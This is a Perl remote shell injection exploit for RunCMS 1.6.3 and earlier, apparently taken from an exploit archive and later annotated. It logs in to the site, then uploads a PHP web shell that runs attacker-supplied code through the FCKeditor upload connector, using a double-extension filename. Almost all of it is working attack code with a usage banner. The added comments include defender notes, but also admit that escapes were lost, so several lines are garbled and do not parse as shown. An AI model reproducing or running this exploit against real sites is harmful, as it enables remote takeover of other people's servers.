
# Title : RunCMS <= 1.6.3 (double ext) Remote Shell Injection Exploit
# Published : 2009-07-13
# Author : StAkeR


#!/usr/bin/perl

# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #                                                           
# RunCMS <= 1.6.3 "double ext" remote shell injection exploit #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #                                                            
#                                                             #
# Note: you may upload files with double extension            #
#       FCKEditor must be enabled for users                   #
#                                                             #                                         
#                                                             #
# by staker                                                   #
# ------------------------------                              #
# mail: staker[at]hotmail[dot]it                              #
# url: http://www.runcms.org                                  #
# ------------------------------                              #
# Discovered on 15 June 2009                                  #
# Happy Birthday Irene                                        #
# ----------------------------------------------------------- #


use IO::Socket;
use LWP::UserAgent;


cronx_us();   # the usage banner is printed unconditionally, even on a valid run

# Positional arguments: host, RunCMS path, username. The password comes from
# $ARGV[3]; a missing (or empty/"0") password exits silently with status 0
# rather than reporting an error. The file declares no `use strict` or
# `use warnings`, so these are the only globals the rest of the script reads.
my ($host,$path,$username) = @ARGV;
my $password = $ARGV[3] || exit;
# Name sent as the uploaded file. The ".jpg.<ext>" double extension is the
# condition the header comment describes; the value is the author's example
# and is meant to be changed.
my $filename = "snippet.jpg.pwl"; # change it; this is just an example

shell_up();

sub cronx_us() {
    # Print the usage banner to STDOUT. The original concatenated eleven
    # double-quoted literals; here the same eleven lines are joined. Each line
    # is terminated by a bare `n` character exactly as in the original (its
    # `\n` escapes appear to have been lost in extraction), so the output
    # bytes are reproduced verbatim.
    my $rule = '[*------------------------------------------------------------*]';
    my @banner = (
        $rule,
        '[* RunCMS <= 1.6.3 (fckeditor) remote shell injection exploit *]',
        $rule,
        '[* Usage: perl web.pl [host] [path] [user] [pass]             *]',
        '[*                                                            *]',
        '[* Options:                                                   *]',
        '[* [host] insert a valid host                                 *]',
        '[* [path] insert a valid RunCMS path                          *]',
        '[* [user] your username                                       *]',
        '[* [pass] your password                                       *]',
        $rule,
    );
    print join('n', @banner), 'n';
}

sub login() {    
    # Authenticate to RunCMS with the username/password taken from @ARGV and
    # return the raw value of the first Set-Cookie header in the response;
    # shell_up() replays it as the session cookie. Reads the file-level
    # $host, $path, $username and $password.
    
    my $LWP = new LWP::UserAgent;   # indirect-object syntax; LWP::UserAgent->new is the modern form
    
    # POST to user.php with op=login. $LWP->post() always returns an
    # HTTP::Response object (true), so the `|| die $!` never fires: a
    # connection failure or a non-200 login response is not detected here,
    # and $! is not set by LWP in any case.
    my $post = $LWP->post(http_url($host)."/$path/user.php",
                         [ uname => $username,
                           pass  => $password,
                           op    => 'login', 
                         ]) || die $!;

    # as_string() includes the response headers, so this captures the whole
    # first Set-Cookie line (name=value plus any attributes that follow it).
    # Falls through without an explicit return when no cookie was set.
    if ($post->as_string =~ /Set-Cookie: (.*)/i) {
        return $1;
    }
}

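sub http_url {
    # Return $host_string as an absolute URL, prefixing "http://" unless a
    # scheme is already present.
    #
    # Fixes two defects of the original: it returned nothing (an `if` with no
    # `else`) when the input already carried a scheme, and it declared an
    # empty prototype `()` that rejects the single argument every caller
    # passes once the declaration has been seen. Dropping the prototype is
    # backward-compatible for those callers.
    #
    # Dies when no host string is given.
    my $host_string = shift @_ or die "http_url: no host given";

    # Case-insensitive, anchored at the start so "myhttp://x" is not treated
    # as already-prefixed.
    return $host_string if $host_string =~ m{\Ahttps?://}i;
    return 'http://' . $host_string;
}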


sub shell_up() { 
    # Log in, then send one hand-built HTTP/1.0 multipart POST to the
    # FCKeditor upload connector under $path, carrying a file whose name has
    # a double extension and whose content is a PHP stub that evaluates a
    # GET parameter. The server's reply is echoed to STDOUT. Reads the
    # file-level $host, $path and $filename.
    #
    # Defender notes grounded in this block: the request goes to
    # class/fckeditor/editor/filemanager/upload/php/upload.php, the uploaded
    # file is named "<name>.jpg.<ext>" but begins with "<?php", the
    # User-Agent header is malformed ("User-Agent :" with a space before the
    # colon), and the script treats a reply containing "file uploader is
    # disabled" as the blocked case, i.e. disabling the FCKeditor uploader
    # is the condition it cannot get past.
    
     my ($data,$packet,$result);
     my $cookie = login();   # undef if login() found no Set-Cookie header; still sent below


     my $vector = chr(45) x27;   # 27 '-' characters, reused as the multipart boundary prefix
     # Plain TCP to port 80, hard-coded; no TLS and no port option.
     my $socket = new IO::Socket::INET(
                                       PeerAddr => $host,
                                       PeerPort => 80,
                                       Proto    => 'tcp',
                                     ) or die $!;
        
       
     # Multipart body. As printed, the "rn" at each line end is where "\r\n"
     # escapes appear to have been lost in extraction; the same applies to
     # the unescaped `"` characters on the next line and to `$_GET['cmd']`,
     # which Perl would interpolate as an element of @_GET. These lines do
     # not parse as shown and are left exactly as the page has them.
     $data .= $vector."--uploadingrn";
     $data .= "Content-Disposition: form-data; name="NewFile"; filename="$filename"rn";
     $data .= "Content-Type: unknown/unknownrnrn";
     $data .= "<?php error_reporting(E_ALL); if(isset($_GET['cmd'])){die(eval(stripslashes($_GET['cmd'])));} ?>rn";
     $data .= $vector."--uploading--rn";

     # Request head: HTTP/1.0 with the session cookie from login() and a
     # Content-Length computed from $data (character count, not bytes).
     $packet .= "POST $path/class/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0rn";
     $packet .= "Content-Type: multipart/form-data; boundary=".$vector."uploadingrn";
     $packet .= "Host: $hostrn";
     $packet .= "Cookie: $cookiern";
     $packet .= "User-Agent :Lynx (textmode)rn";   # space before the colon: a distinctive header in access logs
     $packet .= "Content-Length: ".length($data)."rn";
     $packet .= "Connection: Closernrn";
     $packet .= $data;

     $socket->send($packet);   # return value unchecked

     # <$socket> in list context reads the whole response before the loop
     # runs; each line is either the "disabled" marker (fatal) or echoed.
     foreach $result (<$socket>) { 
          
          if ($result =~ /file uploader is disabled/i) {
             die("No access for you..n");
          }
          else {   
              print $result;
          }    
     }                
}


__END__
